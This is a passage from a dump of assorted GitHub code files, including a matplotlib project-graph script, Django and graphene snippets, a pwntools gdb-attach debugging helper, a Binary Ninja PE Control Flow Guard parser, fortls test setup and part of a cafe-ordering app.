8/LAB8_Q2.py","file_name":"LAB8_Q2.py","file_ext":"py","file_size_in_byte":3546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27754487774","text":"# produce graph from database\n\n\n# import libraries\nimport datetime\n\n# import os\nfrom pathlib import Path, WindowsPath\nimport sqlite3\nimport matplotlib.pyplot as plt\nfrom matplotlib.dates import MonthLocator, DateFormatter\nfrom colorama import init, Fore\n\n# initialise colorama\ninit()\n\n\n# main routine\ndef print_graphs(database_name, output_directory):\n database_name = Path(database_name)\n output_directory = Path(output_directory)\n plot_graphs(database_name, output_directory)\n\n\n# function to plot graphs - primary function\ndef plot_graphs(database_name, output_directory):\n\n months_to_plot = \"12\"\n\n # extract the most recent wip date from the database\n recent_wip_date = most_recent_wip(database_name)\n\n # extract the project_list based on the most recent wip date\n project_list = recent_project_list(recent_wip_date, database_name)\n\n # iterate through the project_list and plot graphs to each project\n sucessful = 0\n failed = 0\n for project in project_list:\n try:\n search_data = (project, months_to_plot)\n # plot the Forecast Data graph\n request = \"wipdate, projectNumber, projectname.name, \\\n forecastCostTotal, forecastSaleTotal, \\\n forecastMarginTotal, currentCost, totalCertified\"\n graph_data = import_data_sql(search_data, request, database_name)\n plot_forecast_graph(graph_data, output_directory)\n\n # plot the variation histogram\n request = \"wipdate, projectNumber, projectname.name, \\\n agreedVariationsNo, budgetVariationsNo, \\\n submittedVariationsNo, agreedVariationsValue, \\\n budgetVariationsValue, submittedVariationsValue\"\n graph_data = import_data_sql(search_data, request, database_name)\n plot_variation_graph(graph_data, output_directory)\n sucessful += 1\n\n except Exception as e:\n print(Fore.RED)\n print(\"-\" * 40)\n print(\"skipping\", search_data[0], \"data incorrect\")\n print(\"Exception error\", e)\n print(\"-\" * 40)\n print(Fore.RESET)\n failed += 1\n continue\n\n if failed > 0:\n print(Fore.YELLOW)\n else:\n print(Fore.WHITE)\n print(\"printed\", sucessful, \"project graphs\", Fore.RESET)\n if failed > 0:\n print(Fore.RED)\n print(failed, \"projects failed to print\\n\")\n print(\"-\" * 40, Fore.RESET)\n\n\n# function to extract date of most recent wip in database\ndef most_recent_wip(database):\n assert type(database) is WindowsPath\n\n # connect to the datebase\n try:\n conn = sqlite3.connect(database)\n except NameError:\n print(Fore.RED)\n print(\"Database file\", database, \"does not exist\")\n print(\"Failed in most_recent_wip\")\n print(Fore.RESET)\n else:\n cur = conn.cursor()\n # extract the most recent wipdate\n cur.execute(\n \"\"\"\n SELECT max(wipDate) as latestdate FROM wipdata\n \"\"\"\n )\n\n latest_date = cur.fetchone()\n # extract the latest_date string from the list returned\n latest_date = str(latest_date[0])\n\n try:\n assert latest_date != \"None\", (\n database + \" contains an incorrect date format of None\"\n )\n except AssertionError as e:\n print(Fore.RED)\n print(\"-\" * 80)\n print(\"FATAL...\\n\", e)\n print(\"-\" * 80)\n print(Fore.RESET)\n pass\n\n return latest_date\n\n\n# function to extract list of most recent wips\ndef recent_project_list(search_date, database):\n assert type(database) is WindowsPath\n projects = []\n\n # connect to the database\n try:\n conn = 
sqlite3.connect(database)\n    except NameError:\n        print(Fore.RED)\n        print(\"-\" * 40)\n        print(\"Database file\", database, \"does not exist\")\n        print(\"Failed in recent_project_list\")\n        print(\"-\" * 40)\n        print(Fore.RESET)\n    else:\n        cur = conn.cursor()\n\n        # extract the list of most recent wips using the search_date\n        cur.execute(\n            \"\"\"\n            SELECT projectNumber AS wipsThisMonth\n            FROM wipdata\n            WHERE (JulianDay(:search_date) - JulianDay(wipDate)) < 35\n            GROUP BY projectNumber\"\"\",\n            {\"search_date\": search_date},\n        )\n\n        project_list = cur.fetchall()\n\n        for i in range(len(project_list)):\n            projects.append(project_list[i][0])\n\n        return projects\n\n\n# function to read data from SQL database based on job number & months\ndef import_data_sql(search_data, request, database):\n    assert type(database) is WindowsPath\n    project_number = search_data[0]\n    months = search_data[1]\n    conn = sqlite3.connect(database)\n    cur = conn.cursor()\n\n    # extract search data\n    # reverse sort order newest to oldest\n    cur.execute(\n        \"\"\"\n        SELECT * FROM (\n        SELECT \"\"\"\n        + request\n        + \"\"\"\n        FROM wipdata\n        JOIN projectName\n        ON wipdata.projectName = projectname.id\n        WHERE projectNumber = :projectNumber\n        AND forecastCostTotal > 0\n        ORDER BY wipdate DESC\n        LIMIT :months)\n        ORDER BY wipdate ASC\n        \"\"\",\n        {\"projectNumber\": project_number, \"months\": months},\n    )\n    return cur.fetchall()\n\n\n# function to produce and output forecast graph\ndef plot_forecast_graph(graph_data, output_directory):\n\n    # Set the common variables\n    # set the font to Trebuchet MS\n    plt.rcParams[\"font.sans-serif\"] = \"Trebuchet MS\"\n    plt.rcParams[\"font.family\"] = \"sans-serif\"\n    # remove padding from plot\n    plt.rcParams[\"axes.autolimit_mode\"] = \"round_numbers\"\n    plt.rcParams[\"axes.xmargin\"] = 0\n    plt.rcParams[\"axes.ymargin\"] = 0\n\n    # These are the \"Tableau 20\" colors as RGB.\n    tableau20 = [\n        (31, 119, 180),\n        (174, 199, 232),\n        (255, 127, 14),\n        (255, 187, 120),\n        (44, 160, 44),\n        (152, 223, 138),\n        (214, 39, 40),\n        (255, 152, 150),\n        (148, 103, 189),\n        (197, 176, 213),\n        (140, 86, 75),\n        (196, 156, 148),\n        (227, 119, 194),\n        (247, 182, 210),\n        (127, 127, 127),\n        (199, 199, 199),\n        (188, 189, 34),\n        (219, 219, 141),\n        (23, 190, 207),\n        (158, 218, 229),\n    ]\n\n    # Scale the RGB values to the [0, 1] range,\n    # which is the format matplotlib accepts.\n    for i in range(len(tableau20)):\n        r, g, b = tableau20[i]\n        tableau20[i] = (r / 255.0, g / 255.0, b / 255.0)\n\n    # You typically want your plot to be ~1.33x wider than tall.\n    # This plot is a rare exception because of the number of lines\n    # being plotted on it.\n    # Common sizes: (10, 7.5) and (12, 9)\n    plt.figure(figsize=(12, 9))\n    fig = plt.figure()\n\n    fig, (ax, ax3) = plt.subplots(nrows=2)\n    ax2 = ax.twinx()\n\n    # Create the forecast totals graph\n    # create the lists\n    dates = []\n    project_number = []\n    project_name = []\n    forecast_cost = []\n    forecast_sale = []\n    forecast_contribution = []\n\n    # loop through the list graph_data to extract the x and y axis\n    # data is produced in the following format\n    # [(u'2016-01-31', -1355036), (u'2015-12-31', -1354858),\n    for data in graph_data:\n        dates.append(data[0])\n        project_number.append(data[1])\n        project_name.append(data[2])\n        forecast_cost.append(data[3] / 1000)\n        forecast_sale.append(data[4] / 1000)\n        forecast_contribution.append(data[5] / 1000)\n\n    # format the dates in the correct format to show\n    dates = [datetime.datetime.strptime(d, \"%Y-%m-%d\").date() for d in dates]\n\n    # plot the data\n    forecast_sale_line = 
ax.plot(\n        dates, forecast_sale, lw=2.5, color=tableau20[5], label=\"Forecast Sale\"\n    )\n\n    forecast_cost_line = ax.plot(\n        dates, forecast_cost, lw=2.5, color=tableau20[0], label=\"Forecast Cost\"\n    )\n\n    forecast_contribution_line = ax2.plot(\n        dates, forecast_contribution, lw=2.5, color=tableau20[2], label=\"Contribution\"\n    )\n\n    # set the y axis label\n    ylabel = \"\\xA3k\"\n    ax.set_ylabel(ylabel, fontsize=14, rotation=\"vertical\")\n    ax2.set_ylabel(ylabel, fontsize=14, rotation=\"vertical\", color=tableau20[2])\n\n    for tl in ax2.get_yticklabels():\n        tl.set_color(tableau20[2])\n\n    # set the title of the graph\n    title = project_name[0] + \" (\" + project_number[0] + \")\\n\"\n    ax.set_title(title, fontsize=16, ha=\"center\")\n    plt.gcf().autofmt_xdate()\n\n    # create the to-date graph\n    # create the lists\n    dates = []\n    project_number = []\n    project_name = []\n    current_cost = []\n    total_certified = []\n\n    # loop through the list graph_data to extract the x and y axis\n    # data is produced in the following format\n    # [(u'2016-01-31', -1355036), (u'2015-12-31', -1354858),\n    for data in graph_data:\n        dates.append(data[0])\n        project_number.append(data[1])\n        project_name.append(data[2])\n        current_cost.append(data[6] / 1000)\n        total_certified.append(data[7] / 1000)\n\n    # format the dates in the correct format to show\n    dates = [datetime.datetime.strptime(d, \"%Y-%m-%d\").date() for d in dates]\n\n    # format the x axis date format\n    months = MonthLocator()\n    month_format = DateFormatter(\"%b-%y\")\n    ax3.fmt_xdata = DateFormatter(\"%b-%y\")\n    ax3.xaxis.set_major_locator(months)\n    ax3.xaxis.set_major_formatter(month_format)\n    ax.xaxis.set_major_locator(months)\n    ax.xaxis.set_major_formatter(month_format)\n\n    # plot the data\n    current_cost_line = ax3.plot(\n        dates, current_cost, lw=2.5, color=tableau20[11], label=\"Cost\"\n    )\n    total_certified_line = ax3.plot(\n        dates, total_certified, lw=2.5, color=tableau20[6], label=\"Certified\"\n    )\n\n    # set the y axis label\n    ylabel = \"\\xA3k\"\n    ax3.set_ylabel(ylabel, fontsize=14, rotation=\"vertical\")\n\n    # add the legend\n    # shrink the axis height by 10% at the bottom\n    box = ax3.get_position()\n    ax3.set_position([box.x0, box.y0 + box.height * 0.1, box.width, box.height * 0.9])\n\n    # combine ax1 and ax2 labels\n    lines, labels = ax.get_legend_handles_labels()\n    lines2, labels2 = ax2.get_legend_handles_labels()\n    lines3, labels3 = ax3.get_legend_handles_labels()\n\n    # place the legend below the axis\n    ax3.legend(\n        lines + lines2 + lines3,\n        labels + labels2 + labels3,\n        loc=\"upper center\",\n        fontsize=9,\n        bbox_to_anchor=(0.5, -0.5),\n        fancybox=True,\n        shadow=True,\n        ncol=5,\n    )\n\n    # plot the graph and save\n    # plt.show()\n    save_path = Path(output_directory, project_number[0] + \" forecast totals graph.png\")\n    plt.savefig(Path(save_path), bbox_inches=\"tight\")\n    plt.close(\"all\")\n\n\n# function to produce and output variation graph\ndef plot_variation_graph(graph_data, output_directory):\n\n    # Set the common variables\n    # set the font to Trebuchet MS\n    plt.rcParams[\"font.sans-serif\"] = \"Trebuchet MS\"\n    plt.rcParams[\"font.family\"] = \"sans-serif\"\n    # outline bar elements with a black border\n    plt.rcParams[\"patch.force_edgecolor\"] = True\n    plt.rcParams[\"patch.facecolor\"] = \"b\"\n\n    # These are the \"Tableau 20\" colors as RGB.\n    tableau20 = [\n        (31, 119, 180),\n        (174, 199, 232),\n        (255, 127, 14),\n        (255, 187, 120),\n        (44, 160, 44),\n        (152, 223, 138),\n        (214, 39, 40),\n        (255, 152, 150),\n        (148, 103, 189),\n        (197, 176, 213),\n        (140, 86, 
75),\n        (196, 156, 148),\n        (227, 119, 194),\n        (247, 182, 210),\n        (127, 127, 127),\n        (199, 199, 199),\n        (188, 189, 34),\n        (219, 219, 141),\n        (23, 190, 207),\n        (158, 218, 229),\n    ]\n\n    # Scale the RGB values to the [0, 1] range,\n    # which is the format matplotlib accepts.\n    for i in range(len(tableau20)):\n        r, g, b = tableau20[i]\n        tableau20[i] = (r / 255.0, g / 255.0, b / 255.0)\n\n    # You typically want your plot to be ~1.33x wider than tall.\n    # This plot is a rare exception because of the number of lines\n    # being plotted on it.\n    # Common sizes: (10, 7.5) and (12, 9)\n    plt.figure(figsize=(12, 9))\n    fig, (ax, ax2) = plt.subplots(nrows=2)\n\n    # Create the variation totals graph\n    # create the lists\n    dates = []\n    project_number = []\n    project_name = []\n    agreed_variation_no = []\n    budget_variation_no = []\n    submitted_variation_no = []\n    agreed_variation_value = []\n    budget_variation_value = []\n    submitted_variation_value = []\n\n    # loop through the list graph_data to extract the x and y axis\n    # data is produced in the following format\n    # [(u'2016-01-31', -1355036), (u'2015-12-31', -1354858),\n    for data in graph_data:\n        dates.append(data[0])\n        project_number.append(data[1])\n        project_name.append(data[2])\n        agreed_variation_no.append(data[3])\n        budget_variation_no.append(data[4])\n        submitted_variation_no.append(data[5])\n        agreed_variation_value.append(data[6] / 1000)\n        budget_variation_value.append(data[7] / 1000)\n        submitted_variation_value.append(data[8] / 1000)\n\n    # create the bins for the bar chart and set width of bar\n    bins = list(range(len(dates)))\n    width_of_date = 0.9\n\n    # format the dates in the correct format to show\n    dates = [datetime.datetime.strptime(d, \"%Y-%m-%d\").date() for d in dates]\n\n    # convert the dates to MMM-YYY\n    xdate = []\n    for d in dates:\n        d = d.strftime(\"%b-%y\")\n        xdate.append(d)\n    dates = xdate\n\n    # plot the data\n    # as this is a stacked graph first we need to zip the arrays for the\n    # bottom statement\n    cumulative_number_histogram = [\n        a + b for a, b in zip(agreed_variation_no, submitted_variation_no)\n    ]\n\n    # plot the bars\n    agreed_variation_no_histogram = ax.bar(\n        bins,\n        agreed_variation_no,\n        width=width_of_date,\n        color=tableau20[5],\n        align=\"edge\",\n        label=\"Agreed\",\n    )\n\n    submitted_variation_no_histogram = ax.bar(\n        bins,\n        submitted_variation_no,\n        bottom=agreed_variation_no,\n        width=width_of_date,\n        color=tableau20[15],\n        align=\"edge\",\n        label=\"Submitted\",\n    )\n\n    budget_variation_no_histogram = ax.bar(\n        bins,\n        budget_variation_no,\n        bottom=cumulative_number_histogram,\n        width=width_of_date,\n        color=tableau20[11],\n        align=\"edge\",\n        label=\"Budget\",\n    )\n\n    # set the y axis label\n    ylabel = \"No of Variations\\n\"\n    ax.set_ylabel(ylabel, fontsize=14, rotation=\"vertical\")\n\n    # set the title of the graph\n    title = project_name[0] + \" (\" + project_number[0] + \")\\n\"\n    ax.set_title(title, fontsize=16, ha=\"center\")\n\n    # plot the data\n    # first set the width of the bins for side by side bar chart\n    width_of_date = 0.3\n    cumulative_bin = [x + width_of_date for x in bins]\n    cumulative_bin_2 = [x + (2 * width_of_date) for x in bins]\n\n    # plot the bars\n    agreed_variation_value_histogram = ax2.bar(\n        bins,\n        agreed_variation_value,\n        width=width_of_date,\n        color=tableau20[5],\n        align=\"edge\",\n        label=\"Agreed\",\n    )\n\n    submitted_variation_value_histogram = ax2.bar(\n        cumulative_bin,\n        submitted_variation_value,\n        width=width_of_date,\n        color=tableau20[15],\n        align=\"edge\",\n        label=\"Submitted\",\n    )\n\n    
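# third bar of each side-by-side group, offset by two bar widths from the bins\n    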
budget_variation_value_histogram = ax2.bar(\n        cumulative_bin_2,\n        budget_variation_value,\n        width=width_of_date,\n        color=tableau20[11],\n        align=\"edge\",\n        label=\"Budget\",\n    )\n\n    # set the y axis label\n    ylabel = \"Value of Variations\\n(\\xA3k)\"\n    ax2.set_ylabel(ylabel, fontsize=14, rotation=\"vertical\")\n\n    # set the x axis label\n    ax2.set_xticks(cumulative_bin)\n    ax2.set_xticklabels(dates)\n    plt.gcf().autofmt_xdate()\n\n    # add the legend\n    # shrink the axis height by 10% at the bottom\n    box = ax2.get_position()\n    ax2.set_position([box.x0, box.y0 + box.height * 0.1, box.width, box.height * 0.9])\n\n    # combine ax1 and ax2 labels\n    lines, labels = ax.get_legend_handles_labels()\n\n    # place the legend below the axis\n    ax2.legend(\n        lines,\n        labels,\n        loc=\"upper center\",\n        fontsize=10,\n        bbox_to_anchor=(0.5, -0.35),\n        fancybox=True,\n        shadow=True,\n        ncol=5,\n    )\n\n    # plot the graph and save\n    # plt.show()\n    save_path = Path(output_directory, project_number[0] + \" variations graph.png\")\n    plt.savefig(Path(save_path), bbox_inches=\"tight\")\n    plt.close(\"all\")\n\n\nif __name__ == \"__main__\":\n    print_graphs(\"./../london/londonwipdata.sqlite\", \"./../london/graphs/\")\n","repo_name":"ushills/WIP","sub_path":"modules/multigraph.py","file_name":"multigraph.py","file_ext":"py","file_size_in_byte":16753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28188379387","text":"import django_filters\nfrom django_filters import DateFilter, CharFilter\nfrom .models import *\n\n# https://django-filter.readthedocs.io/en/master/\n\nclass OrderFilter(django_filters.FilterSet):\n\tstart_date = DateFilter(field_name = 'date_created', lookup_expr='gte')\n\tend_date = DateFilter(field_name = 
'date_created', lookup_expr='lte')\n\tstatus = CharFilter(field_name = 'status', lookup_expr='icontains')\n\tclass Meta:\n\t\tmodel = Order\n\t\tfields = '__all__'\n\t\t# fields = ['product', 'status']\n\t\texclude = ['date_created', 'customer']","repo_name":"sannjayy/django-basic-crm","sub_path":"accounts/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3179976717","text":"from pwn import *\n\ndef attach_dbg(io,brk_pts=[],syms={},init_cmd=''):\n    context.log_level='debug'\n    context.terminal=['tmux','splitw','-h']\n    \n    elf_base=io.libs()[io.cwd+io.argv[0].strip('.')]\n\n    cmd = ['b *'+hex(each+elf_base) for each in brk_pts] \\\n        + ['set $'+sym+'='+str(syms[sym]+elf_base) for sym in syms]\n\n    cmd='\\n'.join(cmd)+'\\n'\n    cmd += init_cmd\n    print(cmd)\n    gdb.attach(io,cmd)\n\n\n\ndef testing():\n    io=process(\"./babyheap\")\n    attach_dbg(io,[0x102,0x200,0x2000])\n    io.interactive()\n\n\nif __name__=='__main__':\n    testing()","repo_name":"primelyw/Pwning","sub_path":"tools/primedbg.py","file_name":"primedbg.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8652698245","text":"import feature_generation as fg\nimport classification as clf\nimport pandas as pd\nimport click\n\n@click.command()\n#@click.option('--img_ext', default=\".png\", help=\"Image extension\")\n@click.option('--pairs_file', default=\"\", help=\"file containing signature image pairs\")\n@click.option('--features_file', default=\"\", help=\"indicates if already have a features file generated, '' means that the features file needs to be generated\")\n@click.option('--base_datasets_dir', default=\"\", help=\"base directory for the dataset being processed\")\n@click.option('--save_classifier', is_flag=True)\n@click.option('--clf_name', default=\"\", help=\"name to save the classifier\")\n@click.option('--dataset', default=\"CEDAR\", type=click.Choice(['CEDAR', 'Bengali', 'Hindi', 'MCYT', 'GPDS'], case_sensitive=True), help=\"Which dataset has to be used for training\")\n@click.option('--logfile', default=\"\", help=\"File where training log will be saved\")\n@click.option('--cross_val', is_flag=True)\ndef main(pairs_file, features_file, base_datasets_dir, save_classifier, clf_name, dataset, logfile, cross_val):\n\tclf.train(dataset, pairs_file, base_datasets_dir, features_file, save_classifier, clf_name, logfile, cross_val)\n\nif __name__ == \"__main__\":\n\tmain()","repo_name":"ehuarotop/versigoff","sub_path":"train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20519550026","text":"from graphene import ObjectType, String, Field, Schema, Dynamic\n\nclass Person(ObjectType):\n    first_name = String(default_value=\"Leia\")\n    last_name = String(default_value=\"Skywalker\")\n    full_name = String()\n    #See the following issue for the fix below https://github.com/graphql-python/graphene/issues/110, answer by sanfilippopablo\n    sibling = Field(lambda: Person)\n\n    def resolve_full_name(parent, info):\n        return f\"{parent.first_name} {parent.last_name}\"\n    \n    def resolve_sibling(parent,info):\n        if parent.first_name == \"Luke\":\n            return Person(first_name = \"Leia\", last_name=parent.last_name)\n        else:\n            return Person(first_name = \"Luke\", 
last_name=parent.last_name)\n\n\nclass Query(ObjectType):\n    me = Field(Person)\n\n    def resolve_me(parent, info):\n        # returns an object that represents a Person\n        return Person(first_name=\"Leia\",last_name=\"Skywalker\")\n\nschema = Schema(query=Query)\n\nquery_string = \"{ me{fullName sibling {fullName sibling {fullName}}} }\"\nresult = schema.execute(query_string)\n\n#Test that my sibling's sibling is me.\nassert result.data[\"me\"][\"fullName\"] == result.data[\"me\"][\"sibling\"][\"sibling\"][\"fullName\"]","repo_name":"patello/graphene-tests","sub_path":"infinite_depth.py","file_name":"infinite_depth.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28909019808","text":"# 剑指 Offer 58 - I. Reverse the order of words in a sentence\n# Given an English sentence, reverse the order of its words while keeping the order of the characters within each word unchanged. For simplicity, punctuation is handled the same way as ordinary letters. For example, given the input string \"I am a student. \", the output is \"student. a am I\".\n\n\n# Example 1:\n\n# Input: \"the sky is blue\"\n# Output: \"blue is sky the\"\n# Example 2:\n\n# Input: \" hello world! \"\n# Output: \"world! hello\"\n# Explanation: The input string may contain leading or trailing spaces, but the reversed string must not include them.\n# Example 3:\n\n# Input: \"a good example\"\n# Output: \"example good a\"\n# Explanation: If there are extra spaces between two words, reduce them to a single space in the reversed string.\n\n\n# Notes:\n\n# A word is made up of non-space characters.\n# The input string may contain leading or trailing spaces, but the reversed string must not include them.\n# If there are extra spaces between two words, reduce them to a single space in the reversed string.\n\n\nclass Solution:\n    # def reverseWords(self, s: str) -> str:\n    #     return \" \".join(reversed(s.strip().split()))\n\n    def reverseWords(self, s: str) -> str:\n        words = []\n        start_position = len(s) - 1\n        while True:\n            while start_position >= 0 and s[start_position] == \" \":\n                start_position -= 1\n            if start_position < 0:\n                break\n            end_position = start_position\n            while start_position >= 0 and s[start_position] != \" \":\n                start_position -= 1\n            words.append(s[start_position + 1 : end_position + 1])\n        return \" \".join(words)\n\n\nif __name__ == \"__main__\":\n    s = Solution()\n    assert s.reverseWords(\"the sky is blue\") == \"blue is sky the\"\n    assert s.reverseWords(\" hello world! \") == \"world! 
hello\"\n assert s.reverseWords(\"a good example\") == \"example good a\"\n assert s.reverseWords(\"\") == \"\"\n assert s.reverseWords(\" \") == \"\"\n","repo_name":"wsgggws/leetcode","sub_path":"sword-means-offer/offer_58_i.py","file_name":"offer_58_i.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"zh","doc_type":"code","stars":22,"dataset":"github-code","pt":"52"} +{"seq_id":"43268220887","text":"from .base_enum import ExtendedEnum, ExtendedIntEnum\n\n\nclass SignedAlgorithm(ExtendedEnum):\n \"\"\"This enum provides the list of Signed Algorithm supported by Dynamic API.\"\"\"\n\n HS256 = 'HS256'\n HS384 = 'HS384'\n HS512 = 'HS512'\n RS256 = 'RS256'\n RS384 = 'RS384'\n RS512 = 'RS512'\n ES256 = 'ES256'\n ES384 = 'ES384'\n ES512 = 'ES512'\n PS256 = 'PS256'\n PS384 = 'PS384'\n PS512 = 'PS512'\n\n\nclass EncryptedAlgorithm(ExtendedEnum):\n \"\"\"This enum provides the list of Encrypted Algorithm supported by Dynamic API.\"\"\"\n\n RSA1_5 = 'RSA1_5'\n RSA_OAEP = 'RSA-OAEP'\n\n\nclass EncryptedEncoding(ExtendedEnum):\n \"\"\"This enum provides the list of Encrypted Encoding supported by Dynamic API.\"\"\"\n\n A256GCM = 'A256GCM'\n A256CBC_PLUS_HS512 = 'A256CBC+HS512'\n A192GCM = 'A192GCM'\n A128GCM = 'A128GCM'\n A128CBC_HS256 = 'A128CBC-HS256'\n A192CBC_HS384 = 'A192CBC-HS384'\n A256CBC_HS512 = 'A256CBC-HS512'\n A128CBC_PLUS_HS256 = 'A128CBC+HS256'\n\n\nclass SigningEncryptionType(ExtendedIntEnum):\n \"\"\"This enum provides the list of Signing and Encryption type.\"\"\"\n\n SignedJWT = 1, 'Signed JWT'\n SecureJWT = 2, 'Secure JWT'\n","repo_name":"bcgov/BCSC-SS","sub_path":"selfservice-api/src/selfservice_api/models/enums/technical.py","file_name":"technical.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"28302922364","text":"\"\"\"\nBinary Nijnja sometimes doesn't parse the full Load Config Directory Table for CFG compiled PE files.\nIssue filed here : https://github.com/Vector35/binaryninja-api/issues/1542\n\n# Parse PE header, find load config directory table\n# Parse CFG structure from lcdt and find cfg function table VA and size\n# Create a list of functions from CFG RVAs\n\n\"\"\"\n\n\ndef parse_data_view(structure, address):\n PE = StructuredDataView(bv, structure, address)\n return PE\n\n\ndef byte_swap(i):\n i = str(i).replace(\" \", \"\")\n temp = int(i, 16)\n return struct.unpack(\"I\", temp))[0]\n\n\nlcte = parse_data_view(\"PE_Data_Directory_Entry\", (bv.start + 0x1c8))\nlcte_virtualAddress = byte_swap(lcte.virtualAddress) # RVA\nlcte_size = byte_swap(lcte.size)\nlcte_virtualAddress = lcte_virtualAddress + bv.start\nGuardCFFunctionTable_offset = bv.types[\"SIZE_T\"].width * 4 # 16/32\nGuardCFFunctionTable = parse_data_view(\n \"PE_Data_Directory_Entry\",\n (lcte_virtualAddress + lcte_size + GuardCFFunctionTable_offset))\nGuardCFFunctionTable_virtualAddress = byte_swap(\n GuardCFFunctionTable.virtualAddress) # RVA\nGuardCFFunctionTable_size = byte_swap(GuardCFFunctionTable.size)\n\nbr = BinaryReader(bv)\nbr.offset = (GuardCFFunctionTable_virtualAddress)\n\nCFG_funcs = []\nfor i in range(0, GuardCFFunctionTable_size):\n CFG_RVA = br.read32le()\n CFG_byte = br.read8()\n CFG_funcs.append(bv.get_function_at(bv.start + CFG_RVA).symbol.full_name)\n\n# set comment at each RVA to the corresponding function's full name\n# for i in range(0,len(CFG_funcs)):\n# bv.set_comment_at(GuardCFFunctionTable_virtualAddress + 
i*5,CFG_funcs[i])\n","repo_name":"rohitwas/binja_scripts","sub_path":"CFG_helper.py","file_name":"CFG_helper.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10327010910","text":"\"\"\"Convert COMBINE-AF SAS input files to Feather for faster loading.\"\"\"\n\nimport os\n\nimport pandas as pd\n\nfrom warfarin.data.utils import decode\n\n\ndef main(args):\n df = pd.read_sas(args.input_filename, format=\"sas7bdat\")\n df = decode(df)\n df.to_feather(args.output_filename)\n\n\nif __name__ == \"__main__\":\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--input_filename\",\n type=str,\n required=True,\n help=\"Path to input SAS (.sas7bdat) file\"\n )\n parser.add_argument(\n \"--output_filename\",\n type=str,\n required=True,\n help=\"Path to output Feather (.feather) file\"\n )\n parsed_args = parser.parse_args()\n\n main(parsed_args)\n","repo_name":"hamilton-health-sciences/warfarin","sub_path":"scripts/convert_sas_to_feather.py","file_name":"convert_sas_to_feather.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"21436153896","text":"from __future__ import annotations\n\nimport shlex\nimport subprocess\nimport sys\nfrom io import StringIO\nfrom pathlib import Path\n\nroot_dir = Path(__file__).parent.parent.resolve()\nsys.path.insert(0, root_dir)\n\n# Compromise since isort does not respect noqa\nfrom fortls.jsonrpc import path_to_uri # noqa: E402, F401\nfrom fortls.jsonrpc import read_rpc_messages # noqa: E402\nfrom fortls.jsonrpc import write_rpc_notification # noqa: E402, F401\nfrom fortls.jsonrpc import write_rpc_request # noqa: E402, F401\n\ntest_dir = root_dir / \"test\" / \"test_source\"\n\n\ndef check_post_msg(result: dict, msg: str, severity: int):\n assert result[\"type\"] == severity\n assert result[\"message\"] == msg\n\n\ndef run_request(request, fortls_args: list[str] = None):\n command = [\n sys.executable,\n \"-m\",\n \"fortls\",\n \"--incremental_sync\",\n ]\n if fortls_args:\n # Input args might not be sanitised, fix that\n for i in fortls_args:\n command.extend(shlex.split(i, posix=False))\n\n pid = subprocess.Popen(\n command,\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n )\n results = pid.communicate(input=request.encode())\n tmp_file = StringIO(results[0].decode())\n results = read_rpc_messages(tmp_file)\n parsed_results = []\n for result in results:\n try:\n parsed_results.append(result[\"result\"])\n except KeyError:\n try:\n # Present in `method`s\n parsed_results.append(result[\"params\"])\n except:\n raise RuntimeError(\n \"Only 'result' and 'params' keys have been implemented for testing.\"\n \" Please add the new key.\"\n )\n except:\n raise RuntimeError(\n \"Unexpected error encountered trying to extract server results\"\n )\n errcode = pid.poll()\n return errcode, parsed_results\n","repo_name":"fortran-lang/fortls","sub_path":"test/setup_tests.py","file_name":"setup_tests.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"en","doc_type":"code","stars":182,"dataset":"github-code","pt":"52"} +{"seq_id":"38539421379","text":"import time\nfrom typing import Dict, List, Tuple\nfrom utils import delete_item, get_input_ints, dump_json, print_items, \\\n create_item, validate_phone_number, print_items_formatted, print_dict_formatted\nfrom orders import create_prodids, 
update_order\nfrom mysqlutils import read_from_db, get_item_query\nfrom mysqlops import orders_result, price_summary\n\n\n\ndef update_product(item_list, my_dict, table_name, connect, item_id, sql_no_sql_update):\n \n \n '''\n This is the function for updating the product\n \n '''\n \n product_index = len(item_list) + 100\n product_index = int(input('Input:Index Value that you want updated?'))\n \n while product_index > len(item_list):\n \n product_index = int(input('Input: Correct index value, please ?'))\n \n #new_prod = input(input_string)\n item_list[product_index] = my_dict\n if table_name is None: \n return product_index\n sql_no_sql_update(table_name, my_dict, product_index, item_id, connect) #updating a prod or courier row in the sql /cafe database now\n prod_courier_table = read_from_db(get_item_query(table_name), connect)\n print(\"The appended list: \")\n print_items_formatted (prod_courier_table)\n return product_index\n\n \n \n \ndef get_main_menu(): \n \n \"\"\" \n This function displays the menu options from the end user. This could be either 0 or 1\n 0 is for exiting out of the application and\n 1 is for getting the list of products\n 2 is for getting the list of couriers\n 3 if for getting the list of orders\n \n \"\"\"\n \n print(\"Select your option from the following:\")\n my_dict = {0:\"Exit out of the application\", 1: \"Menu options\", \n 2: \"Delivery options\", 3: \"Order options\"}\n headers = [\"Option\", \"Action\"]\n print_dict_formatted(headers, my_dict)\n user_option = get_input_ints(3)\n return user_option\n\ndef get_item_menu(user_selection: str):\n \n \"\"\"\n This function displays the product options\n \n \"\"\"\n \n # print(\"You are now in the \" + user_selection + \" menu\\n\")\n # print(\"Please read the below possible options\\n\\n\")\n # print(\"Select 0 to return to the main menu \\n OR\")\n # print(\"Select 1 to print the \" + user_selection + 